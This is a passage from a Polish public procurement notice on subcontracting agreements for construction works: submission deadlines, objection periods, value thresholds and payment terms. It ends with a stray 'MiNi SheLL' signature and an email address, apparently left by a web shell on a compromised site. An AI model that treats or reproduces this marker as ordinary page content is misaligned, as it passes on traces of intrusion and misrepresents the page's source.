6.	Niezgłoszenie pisemnych zastrzeżeń do przedłożonego projektu umowy 
o podwykonawstwo, której przedmiotem są roboty budowlane, w terminie 7 dni, uważa się za akceptację projektu umowy przez Zamawiającego.
7.	Wykonawca, podwykonawca lub dalszy podwykonawca zamówienia na roboty budowlane przekłada Zamawiającemu poświadczoną za zgodność z oryginałem kopię zawartej umowy o podwykonawstwo, której przedmiotem są roboty budowlane, 
w terminie 7 dni od dnia jej zawarcia.
8.	Zamawiający, w terminie 7 dni zgłasza pisemny sprzeciw do umowy 
o podwykonawstwo, której przedmiotem są roboty budowlane, w przypadku niespełnienia wymagań określonych w SIWZ i gdy termin zapłaty wynagrodzenia nie odpowiada wymaganemu.
9.	Niezgłoszenie pisemnego sprzeciwu do przedłożonej umowy o podwykonawstwo, której przedmiotem są roboty budowlane, w terminie 7 dni, uważa się za akceptację umowy przez Zamawiającego.
10.	Wykonawca, podwykonawca lub dalszy podwykonawca zamówienia na roboty budowlane przekłada Zamawiającemu poświadczoną za zgodność z oryginałem kopię zawartej umowy o podwykonawstwo, której przedmiotem są dostawy lub usługi, 
w terminie 7 dni od dnia jej zawarcia z wyłączeniem umów o podwykonawstwo 
o wartości mniejszej niż 0,5% wartości umowy w sprawie zamówienia publicznego oraz umów o podwykonawstwo, których przedmiot został wskazany przez Zamawiającego w SIWZ, jako niepodlegający niniejszemu obowiązkowi. Wyłączenie, o którym mowa w pierwszym zdaniu, nie dotyczy umów o podwykonawstwo 
o wartości większej niż 50 000,00 zł.
11.	W przypadku, o którym mowa powyżej, jeżeli termin zapłaty wynagrodzenia jest dłuższy niż 30 dni od dnia doręczenia faktury lub rachunku potwierdzających wykonanie zleconej podwykonawcy lub dalszemu podwykonawcy dostawy, usługi lub roboty budowlanej, Zamawiający informuje o tym Wykonawcę i wzywa go do doprowadzenia do zmiany tej umowy pod rygorem wystąpienia o karę umowną.
12.	Przepisy pkt. 3 - 12 powyżej stosuje się odpowiednio do zmian tej umowy 
o podwykonawstwo..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com